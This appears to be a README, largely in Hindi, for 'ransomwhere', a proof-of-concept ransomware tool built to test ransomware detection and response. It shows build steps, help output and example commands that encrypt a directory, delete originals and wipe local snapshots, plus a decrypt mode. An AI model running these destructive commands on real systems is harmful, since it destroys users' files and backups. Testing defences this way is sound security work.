
आपकी ransomware प्रतिक्रिया रणनीति का परीक्षण करने के लिए एक PoC रैंसमवेयर नमूना।
एक प्रूफ ऑफ कॉन्सेप्ट रैनसमवेयर नमूना जो आपकी फ़ाइलों को एन्क्रिप्ट करता है ताकि आप अपनी रैनसमवेयर पहचान और रोकथाम रणनीतियों का परीक्षण कर सकें।
यदि कोई तर्क प्रदान नहीं किए जाते हैं, ransomwhereस्वचालित रूप से encrypt मोड निष्पादित करेगा बिना मूल फ़ाइलों को हटाए।
मैं इस सॉफ़्टवेयर के कारण होने वाली किसी भी क्षति के लिए ज़िम्मेदार नहीं हूँ।
# with make and Go installed
% make build
% ransomwhere -h
Usage of ransomwhere:
-delete
Delete files after encrypting.
-log string
The log level to use. (default "error")
-mode string
Encrypt or decrypt the ransomware files. (default "encrypt")
-path string
Path to the directory where to traverse files to ransom. (default "/Users/niels")
-wipe
Wipe local snapshots while encrypting.
# straight from source, encrypt in our home directory
% make FLAGS="-log=warn -delete=false -mode=encrypt"
# from the binary, encrypt /home/ransom/
% ./app -log=warn -delete=false -mode=encrypt -path=/home/ransom/
# encrypt, delete original files and wipe backups like a real ransomware (DANGEROUS)
% ./app -delete=true -wipe=true
# revert the ransom operation and restore any files
% ./app -mode=decrypt